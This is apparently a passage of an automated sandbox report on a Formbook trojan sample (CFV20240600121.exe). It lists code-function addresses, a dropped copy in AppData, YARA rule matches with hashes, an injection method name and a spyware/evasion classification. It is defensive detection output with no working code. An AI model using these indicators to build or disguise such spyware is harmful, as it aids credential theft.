            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01496BD712_2_01496BD7
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DEA8012_2_013DEA80
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EAD0012_2_013EAD00
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147CD1F12_2_0147CD1F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F8DBF12_2_013F8DBF
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013DADE012_2_013DADE0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0C0012_2_013E0C00
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D0CF212_2_013D0CF2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01480CB512_2_01480CB5
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01454F4012_2_01454F40
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01422F2812_2_01422F28
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01400F3012_2_01400F30
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01482F3012_2_01482F30
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013ECFE012_2_013ECFE0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0145EFA012_2_0145EFA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D2FC812_2_013D2FC8
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E0E5912_2_013E0E59
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149EE2612_2_0149EE26
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149EEDB12_2_0149EEDB
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013F2E9012_2_013F2E90
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149CE9312_2_0149CE93
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014AB16B12_2_014AB16B
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141516C12_2_0141516C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CF17212_2_013CF172
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013EB1B012_2_013EB1B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148F0CC12_2_0148F0CC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014970E912_2_014970E9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149F0E012_2_0149F0E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E70C012_2_013E70C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149132D12_2_0149132D
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013CD34C12_2_013CD34C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0142739A12_2_0142739A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E52A012_2_013E52A0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014812ED12_2_014812ED
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FB2C012_2_013FB2C0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149757112_2_01497571
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014A95C312_2_014A95C3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147D5B012_2_0147D5B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013D146012_2_013D1460
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149F43F12_2_0149F43F
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149F7B012_2_0149F7B0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0142563012_2_01425630
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_014916CC12_2_014916CC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147591012_2_01475910
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E995012_2_013E9950
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FB95012_2_013FB950
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0144D80012_2_0144D800
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E38E012_2_013E38E0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FB7612_2_0149FB76
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01455BF012_2_01455BF0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0141DBF912_2_0141DBF9
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FFB8012_2_013FFB80
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FA4912_2_0149FA49
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01497A4612_2_01497A46
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01453A6C12_2_01453A6C
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0148DAC612_2_0148DAC6
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01425AA012_2_01425AA0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0147DAAC12_2_0147DAAC
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01481AA312_2_01481AA3
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01491D5A12_2_01491D5A
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01497D7312_2_01497D73
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E3D4012_2_013E3D40
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013FFDC012_2_013FFDC0
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_01459C3212_2_01459C32
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FCF212_2_0149FCF2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FF0912_2_0149FF09
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E1F9212_2_013E1F92
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A3FD212_2_013A3FD2
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013A3FD512_2_013A3FD5
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_0149FFB112_2_0149FFB1
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 12_2_013E9EB012_2_013E9EB0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0287DE7413_2_0287DE74
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07230DB013_2_07230DB0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0723FB7813_2_0723FB78
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072307F113_2_072307F1
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072386F813_2_072386F8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072393A013_2_072393A0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07238F6813_2_07238F68
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07230DA013_2_07230DA0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07238B3013_2_07238B30
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0723ABA813_2_0723ABA8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072319A113_2_072319A1
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072319B013_2_072319B0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0723080013_2_07230800
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729AEB313_2_0729AEB3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07299D3F13_2_07299D3F
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07294BD813_2_07294BD8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729A2A313_2_0729A2A3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729610013_2_07296100
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729081813_2_07290818
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729707813_2_07297078
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072998C813_2_072998C8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729AF0813_2_0729AF08
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07297F6813_2_07297F68
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07297F5813_2_07297F58
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729EFA913_2_0729EFA9
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729EFB813_2_0729EFB8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07298E2813_2_07298E28
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729968313_2_07299683
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729969013_2_07299690
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729AEF813_2_0729AEF8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729940B13_2_0729940B
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729941813_2_07299418
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07299CB713_2_07299CB7
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07299CCC13_2_07299CCC
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07298B0813_2_07298B08
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07298B1813_2_07298B18
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07294B4813_2_07294B48
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07295BA813_2_07295BA8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_07294B9B13_2_07294B9B
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729410113_2_07294101
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072991E013_2_072991E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_072991D313_2_072991D3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 13_2_0729702D13_2_0729702D
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115010018_2_01150100
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A600018_2_011A6000
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011E02C018_2_011E02C0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116053518_2_01160535
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0118475018_2_01184750
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116077018_2_01160770
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115C7C018_2_0115C7C0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117C6E018_2_0117C6E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117696218_2_01176962
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011629A018_2_011629A0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116284018_2_01162840
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116A84018_2_0116A840
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119889018_2_01198890
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011468B818_2_011468B8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0118E8F018_2_0118E8F0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115EA8018_2_0115EA80
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116AD0018_2_0116AD00
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116ED7A18_2_0116ED7A
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01178DBF18_2_01178DBF
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01168DC018_2_01168DC0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115ADE018_2_0115ADE0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01160C0018_2_01160C00
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01150CF218_2_01150CF2
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01180F3018_2_01180F30
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A2F2818_2_011A2F28
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D4F4018_2_011D4F40
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011DEFA018_2_011DEFA0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01152FC818_2_01152FC8
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01160E5918_2_01160E59
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01172E9018_2_01172E90
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0114F17218_2_0114F172
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119516C18_2_0119516C
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116B1B018_2_0116B1B0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0114D34C18_2_0114D34C
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011633F318_2_011633F3
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011652A018_2_011652A0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117B2C018_2_0117B2C0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117D2F018_2_0117D2F0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0115146018_2_01151460
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116349718_2_01163497
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011A74E018_2_011A74E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116B73018_2_0116B730
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116995018_2_01169950
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117B95018_2_0117B950
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0116599018_2_01165990
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011CD80018_2_011CD800
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011638E018_2_011638E0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117FB8018_2_0117FB80
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0119DBF918_2_0119DBF9
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D5BF018_2_011D5BF0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D3A6C18_2_011D3A6C
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01163D4018_2_01163D40
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_0117FDC018_2_0117FDC0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_011D9C3218_2_011D9C32
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01179C2018_2_01179C20
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01161F9218_2_01161F92
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 18_2_01169EB018_2_01169EB0
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: String function: 011CEA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: String function: 011A7E54 appears 97 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 0145F290 appears 105 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 013CB970 appears 280 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 01427E54 appears 111 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 0144EA12 appears 86 times
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: String function: 01415130 appears 58 times
            Source: CFV20240600121.exeStatic PE information: invalid certificate
            Source: CFV20240600121.exe, 00000000.00000002.2103263978.00000000041D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000000.2056245565.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFhmf.exe4 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2086909863.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2118386465.0000000007990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2118490360.00000000079DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs CFV20240600121.exe
            Source: CFV20240600121.exe, 00000000.00000002.2111028089.00000000051D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs CFV20240600121.exe
            Source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewritej% vs CFV20240600121.exe
            Source: CFV20240600121.exe, 0000000C.00000002.2382461967.00000000014CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CFV20240600121.exe
            Source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewritej% vs CFV20240600121.exe
            Source: CFV20240600121.exeBinary or memory string: OriginalFilenameFhmf.exe4 vs CFV20240600121.exe
            Source: CFV20240600121.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: CFV20240600121.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: BPSHhDGmARC.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.CFV20240600121.exe.4e718c0.2.raw.unpack, vTUORdGgKEO15QVN9b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, vTUORdGgKEO15QVN9b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.51d0000.5.raw.unpack, cPvKSbL63MQZmurUtZ.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.CFV20240600121.exe.4dee2a0.3.raw.unpack, vTUORdGgKEO15QVN9b.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.CFV20240600121.exe.3210d94.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 13.2.BPSHhDGmARC.exe.291874c.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.CFV20240600121.exe.3220dac.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.CFV20240600121.exe.a0c0000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@31/16@16/14
            Source: C:\Users\user\Desktop\CFV20240600121.exeFile created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2520:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
